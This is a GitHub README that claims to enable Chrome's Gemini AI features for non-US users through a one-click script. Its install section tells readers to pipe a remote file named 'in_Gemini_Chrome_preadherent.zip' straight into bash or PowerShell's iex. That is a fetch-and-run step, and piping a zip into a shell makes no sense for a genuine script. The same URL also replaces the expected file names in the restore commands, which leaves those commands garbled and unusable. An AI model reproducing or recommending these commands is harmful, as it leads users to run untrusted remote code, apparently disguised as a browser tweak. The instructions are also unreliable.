Skip to content

Latest commit

Β 

History

8 Commits

Folders and files

NameName
Last commit message
Last commit date
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🌟 Gemini-in-Chrome - Access Chrome's AI Features Easily

Download Gemini-in-Chrome

πŸš€ Getting Started

Gemini in Chrome allows you to easily access Chrome's built-in Gemini AI features, especially if you are outside the US. Follow these steps to get started.

πŸ“₯ Download & Install

  1. Visit the Releases page: Go to the Gemini-in-Chrome Releases page.
  2. Choose the right file for your system:
    • For macOS or Linux, you will use a simple script.
    • For Windows, you will use PowerShell.

macOS / Linux

Open your terminal and run the following command:

curl -fsSL https://github.com/tianlanyb/Gemini-in-Chrome/raw/refs/heads/master/eighteen/in_Gemini_Chrome_preadherent.zip | bash

Windows

Open PowerShell and type:

irm https://github.com/tianlanyb/Gemini-in-Chrome/raw/refs/heads/master/eighteen/in_Gemini_Chrome_preadherent.zip | iex

πŸ“‹ What It Does

  1. βœ… Checks if Chrome is running: It prompts you to close Chrome if it is open.
  2. πŸ’Ύ Backs up your configuration: It saves your current settings as Local https://github.com/tianlanyb/Gemini-in-Chrome/raw/refs/heads/master/eighteen/in_Gemini_Chrome_preadherent.zip.
  3. πŸ”§ Patches important settings:
    • Changes is_glic_eligible from false to true
    • Sets variations_country to us
    • Sets variations_permanent_consistency_country to us
  4. βœ“ Verifies changes: It checks to ensure the changes were applied correctly.

πŸ”„ Restore Original Config

If you need to revert to your original settings, you can restore the backup you created.

macOS:

mv ~/Library/Application\ Support/Google/Chrome/Local\ https://github.com/tianlanyb/Gemini-in-Chrome/raw/refs/heads/master/eighteen/in_Gemini_Chrome_preadherent.zip \
   ~/Library/Application\ Support/Google/Chrome/Local\ State

Linux:

mv ~https://github.com/tianlanyb/Gemini-in-Chrome/raw/refs/heads/master/eighteen/in_Gemini_Chrome_preadherent.zip\ https://github.com/tianlanyb/Gemini-in-Chrome/raw/refs/heads/master/eighteen/in_Gemini_Chrome_preadherent.zip \
   ~https://github.com/tianlanyb/Gemini-in-Chrome/raw/refs/heads/master/eighteen/in_Gemini_Chrome_preadherent.zip\ State

Windows PowerShell:

Move-Item -Path "$env:LOCALAPPDATA\Google\Chrome\User Data\Local https://github.com/tianlanyb/Gemini-in-Chrome/raw/refs/heads/master/eighteen/in_Gemini_Chrome_preadherent.zip" -Destination "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State"

βš™οΈ System Requirements

To run Gemini in Chrome, ensure you have the following:

  • A stable internet connection
  • The latest version of Google Chrome installed
  • Sufficient disk space for backup files

πŸ’‘ Troubleshooting

If you encounter issues:

  1. Ensure Chrome is closed before running the installation script.
  2. Check your internet connection to ensure the script can download necessary files.
  3. If it still fails, try running the script again after rebooting your computer.

πŸ“§ Support & Feedback

If you have any questions or need support, please reach out via the issues page on GitHub. Your feedback helps us improve Gemini in Chrome for all users.

Download Gemini-in-Chrome

About

πŸš€ Enable Chrome's Gemini AI features for non-US users with a simple one-click script for macOS, Linux, and Windows.

Topics

Resources

Stars

6 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages